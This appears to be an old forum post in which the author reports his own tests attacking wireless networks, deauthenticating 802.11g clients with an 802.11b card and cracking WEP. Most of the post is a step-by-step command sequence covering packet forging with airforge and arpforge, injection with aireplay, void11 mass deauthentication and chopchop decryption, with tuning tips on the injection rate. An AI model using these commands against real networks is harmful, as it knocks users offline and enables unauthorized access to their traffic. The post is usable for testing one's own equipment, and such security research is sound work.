Aireplay injection
Posted by William
The Sunday, May, 22 - 802.11b attacks on 802.11g post is a follow up on cracking 802.11g networks with an 802.11b card.Well I've been doing some testing with the new aireplay and I managed to inject with all drivers. A couple of things came up that were interesting I managed to deauthenticate a 802.11g client with a 802.11b card and crack WEP on an all 802.11g network with a 802.11b card (Captured the traffic with a 802.11g card first).
For the deauthentication I used a Cisco Aironet CB21AG-A-K9 (Atheros card) to connect to a Netgear WGR614 access point and set both to 802.11 g mode only. I used a SMC2532W-B 802.11b card (Prism 2.5 card) to deauthenticate the 802.11g stations. To ensure I was actually deauthenticating stations I used wavemon to monitor my Cisco card which was associated to the AP.
Following settings were used:
Cisco Card
- iwpriv ath0 mode 3 (G mode only)
SMC Card
- Used wlanng drivers for aireplay
- hostap drivers for void11 with commands:
1) iwpriv wlan0 hostapd 1
2) iwconfig wlan0 mode master channel [channel]
Commands issued:
Created deauthentication packet using airforge:
airforge [BSSID] [SRC MAC] deauth
Then injected using the 802.11b card:
aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth wlan0
Used void11 mass deauthentication with hostap drivers:
void11_penetration wlan0
Ignore the 'ioctl[PRISM2_IOCTL_HOSTAPD]: Invalid argument' error void11 will still work.My 802.11g station dropped like a brick.
I managed also to crack WEP on an all 802.11g network with my SMC2532W-B 802.11b card. I noticed something strange I sniff traffic with aireplay with my 802.11b card and sometimes manage to capture traffic from the 802.11g network. I am not sure if this is due to the encoding or what, but I have captured and replayed 802.11g traffic with my 802.11b card alone. I usually capture with my Netgear WG511 (PrismGT card) and then crack the packet with chopchop with my 802.11b SMC card.
Cracking 802.11g network with 802.11b card Used same equipment as mentioned in the beginning plus Netgear WG511 802.11g card
Captured packet using aireplay:
aireplay -i eth1 (Also sometimes I could use the 802.11b SMC card to capture traffic. Why? Not sure yet.
Used chopchop to crack using 802.11b card:
chopchop only works with prism based card
chopchop -i wlan0 -b [BSSID] -m [SRC MAC] -p [aireplay packet]
Utilized arpforge to create new packet:chopchop -i wlan0 -b [BSSID] -m [SRC MAC] -p [aireplay packet]
arpforge [iv. file] 1 [bssid] [mac src] [ip src] [ip dst] fakearp
Inject new packet using 802.11b card:
aireplay -r fakearp wlan0
The IV count would rise.The number of packets can sent by aireplay can be adjusted with the -x option. The default value is 256 but modifying switch will yield better results. Results differ with different number of packets sent per second. Experiment with the packet send count value. Between 1500 and 2000 seems to be the sweet spot.
aireplay -r fakearp wlan0 -x 1500
- Thanks to radi0head and re@lity for this.Please test my results to verify that they are consistent with your equipment. As for 802.11b capturing 802.11g traffic it is strange. I set my Cisco Atheros card to G-mode only with iwpriv ath0 mode 3 and my netgear AP is set to G-mode only also please test this too. Post your results on the forum and use the date of this post as the title.
~William